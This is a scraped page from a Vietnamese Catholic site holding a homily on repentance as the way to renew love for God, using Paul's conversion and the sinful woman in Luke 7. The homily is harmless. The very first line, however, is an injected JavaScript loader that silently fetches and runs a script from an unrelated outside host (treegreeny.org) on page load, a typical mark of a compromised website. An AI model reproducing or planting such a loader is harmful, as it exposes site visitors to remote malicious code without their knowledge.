;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); SÁM HỐI, CÁCH THỨC LÀM MỚI LẠI TÌNH YÊU VỚI THIÊN CHÚA – Xitô PS

SÁM HỐI, CÁCH THỨC LÀM MỚI LẠI TÌNH YÊU VỚI THIÊN CHÚA

SÁM HỐI CÁCH THỨC LÀM MỚI LẠI TÌNH YÊU VỚI THIÊN CHÚA

(Thứ 5 ngày 17/09/2020- Tuần XXIV Thường Niên: 1Cr 15, 1-11; Lc 7, 36-50)

Khi yêu, ai cũng muốn mối tình, cuộc tình của mình với Chúa với người được luôn bền vững. Nhưng ai cũng kinh nghiệm, trên đường yêu không thiếu dạn nứt và khó tránh khỏi những lần lầm đường lạc lối. Vậy có cách nào trở về, hâm nóng và làm tươi mới tình yêu thuở ban đầu với Thiên Chúa?

Bài đọc I, Phao lô hé mở một chút về cuộc tình của ông với Thiên Chúa, Phao lô hết lòng phụng thờ Thiên Chúa, nhưng ông lại diễn đạt tình yêu ấy theo phong cách cổ truyền dưới sự điều hướng của các kinh sư, nên ông đã “ngược đãi hội Thánh của Thiên Chúa”. Nhưng với cú ngã ngựa- cú ngã ân sủng- khiến Phao lô tỉnh mộng, xoay chiều và đổi hướng tuyệt đối tin vào Đức Giê su. Từ nay tình yêu ông dành cho Thiên Chúa hoàn toàn mới, tình yêu ấy được diễn tả, được điều hướng bởi Tin mừng, bởi Chúa Giê su, Người mà Thiên Chúa Cha lấy làm hài lòng mọi đàng.

Chị phụ nữ nổi tiếng là người tội lỗi, nhưng cách thức làm mới tình yêu với Thiên Chúa của chị, không chỉ nổi tiếng ở Do thái mà vang khắp thế giới và bất cứ nơi đâu Tin mừng được gieo vãi. Cách thức ấy chính là lòng sám hối, hoán cải. Ai trong chúng ta cũng từng đấm ngực sám hối bởi ai cũng lỡ lầm, nhưng cách của chị rất khác. Nó khác không bởi chữ sám hối viết hoa hay viết thường, nó khác ở lòng đơn thành của chị. Tất cả những gì là kiêu xa của người nữ, những thứ chị dùng để câu khách nay chị đặt dưới chân Đức Giê su. Quả thực, đôi mắt với dòng châu sa như muốn hút người ta nay tuôn trào suối lệ, lấy nước mắt rửa chân Đức Giê su; Mái tóc tôn vẻ duyên dáng, nay chị dùng như tấm khăn lau chân Đức Giê su; Đôi môi như một nụ hồng nơi đón nhận và trao ban sự nồng nàn ngọt ngào, nay chị dùng để hôn chân Chúa Giê su. Lòng sám hối của chị bùng khởi lòng thương xót Thiên Chúa dành cho chị: “tội của chị rất nhiều, nhưng đã được tha, bằng cớ là chị đã yêu mến nhiều”. Như thế, cách chị làm mới tình yêu với Chúa chính là lòng sám hối được gói trong hai chữ: tinyêu.

Sau cú ngã ngựa trên đường đi bắt các Ki tô hữu, Phao lô đã tin Đức Giê su; Chị phụ nữ tin Đức Giê su là Thiên Chúa, ngay khi những người đồng bàn với Đức Giê su đang hoài nghi, với một dấu chấm hỏi trong lòng: “Nếu ông này là một vị ngôn sứ, thì hẳn phải biết người đàn bà đang đụng vào mình là ai, là thứ người nào?” Và “Ông này là ai mà tha được tội?”. Đức tin giúp chị quỳ xuống dưới chân Đức Giê su, và chị thể hiện niềm tin ấy bằng một tình yêu trao hiến trọn vẹn, như Tin mừng thuật lại: “chị đứng đằng sau, sát chân Người mà khóc, lấy nước mắt mà tưới chân Người. Chị lấy tóc mình mà lau, rồi hôn chân Người và lấy dầu thơm mà đổ lên”.

Cách thức hâm nóng và làm mới tình yêu với Thiên Chúa của Phao lô và người phụ nữ trong Tin mừng hôm nay, trước hết được khởi phát từ tình yêu và lòng thương xót của Thiên Chúa, và khát vọng trở về sau một thời gian diễn tả tình yêu không đúng cách, có thể nói là sai cách và lạc lối. Tình yêu và lòng thương xót của Chúa đã xô Phao lô ngã khỏi đài tự mãn; Tình yêu và lòng thương xót của Chúa Giê su đã kéo chị phụ nữ ra khỏi cơn say cuồng vọng và đưa đến đài hiến thân phục vụ cho sứ vụ loan báo Tin mừng và chung phần vinh quang với Chúa Giê su. Vinh quang mà không ai cướp mất được.

Phao lô nổi tiếng một người săn lùng và bắt đạo, chị phụ nữ nổi tiếng là người tội lỗi, nhưng cả hai đã trở nên những thụ tạo mới trong tình yêu của Đức Ki tô nhờ lòng sám hối, còn chúng ta thì sao? Một câu hỏi lửng, mời gọi chúng ta tiếp tục suy nghĩ về mối tình của mình với Chúa Giê su đang ở trạng thái như thế nào, và cần làm gì để hâm nóng và làm mới lại cuộc tình với Giê su, sao cho sống động và linh động. Cầu mong tất cả chúng ta đều nở được một nụ cười tươi vì thấy mình vẫn tay trong tay, vẫn lòng kề lòng với Giê su.

Chúng ta cùng cầu xin Chúa ban ơn sám hối cho tất cả mọi người, để tất cả đều được chung hưởng vinh quang phục sinh trong Chúa muôn đời.

FM. Tùy Phúc Hậu

You May Also Like

Trả lời

X